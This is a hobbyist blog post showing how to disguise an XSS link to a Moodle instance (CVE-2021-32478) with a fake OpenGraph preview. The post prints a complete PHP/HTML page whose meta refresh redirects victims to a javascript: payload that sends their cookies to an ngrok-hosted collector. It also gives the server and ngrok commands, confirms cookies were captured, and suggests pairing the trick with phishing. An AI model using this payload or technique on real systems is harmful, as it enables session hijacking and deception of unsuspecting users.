This page looks best with JavaScript enabled

Abusing OpenGraphs previews

 ·  ☕ 2 min read

Introduction

While exploiting CVE-2021-32478 realised that when sharing the link on some social media it doesn’t show any preview on the link. While legit links on most cases they preview some brief description or even an image.

After a couple of searches on google found this post explaining it. Basically whenever you share a link then it makes a GET request filtering some html meta tags.

Makes sense that when sharing a link to this particular CVE which is almost a blank page it isn’t able to get that metadata from the page, hence showing no preview.

The idea to trick people into thinking that the link is legit consists of creading a malicious web server that includes a PHP file with the needed meta tags and then redirects to the malicious XSS url.

Setup

Following the instructions on how the preview are generated let’s create the evil php file to abuse CVE-2021-32478 which is in and enpoint that doesn’t show any preview which may be some sort of suspicious:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
<!DOCTYPE html>
<html>
    <head>
    <meta property="og:title" content="Moodle" />
    <meta property="og:url" content="https://redacted.com" />
    <meta property="og:description" content="UDC">
    <meta property="og:image" itemprop="image" content="https://redacted.com/pluginfile.php/1/core_admin/logocompact/300x300/1627037995/01.png"/>
    <meta property="og:type" content="article" />
    <meta property="og:locale" content="es_ES" />
    <meta http-equiv="refresh" content="1;url=https://redacted.com/mod/lti/auth.php?redirect_uri=javascript:document.location=`http://537896773fa6.ngrok.io/cookie.php?c=${document.cookie};`">
    </head>
    <body>
    <link itemprop="thumbnailUrl" href="https://redacted.com/pluginfile.php/1/core_admin/logocompact/300x300/1627037995/01.png">

    <span itemprop="thumbnail" itemscope itemtype="http://schema.org/ImageObject">
        <link itemprop="url" href="https://redacted.com/pluginfile.php/1/core_admin/logocompact/300x300/1627037995/01.png">
    </span>
        <h1>Pwned</h1>
    </body>
</html>

Another interesting detail is that in order to redirect afterwards it has to be done with <meta http-equiv="refresh".../> because Location http header caused preview to not being rendered.

Start a server with php (php -S 0.0.0.0:8000) and ngrok (ngrok http 8000). Now we can share the ngrok link and here is how it displays on discord (but works the same way in most common social medias):

Display

If you share the link before starting the web server It won’t generate any preview since can’t get the meta tags.

Finally we can validate the POC when the victim clicks on the url we can see that we got the cookies:

Cookies

However, sharing a ngrok url may be even more suspicous than sharing an url that doesn’t show a preview on social media. However this could be used with other phishing techniques.

Note that url shorteners won’t work because they rely on redirects, tried out maskphish when realised about that behaviour.

Share on

ITasahobby
WRITTEN BY
ITasahobby
InTernet lover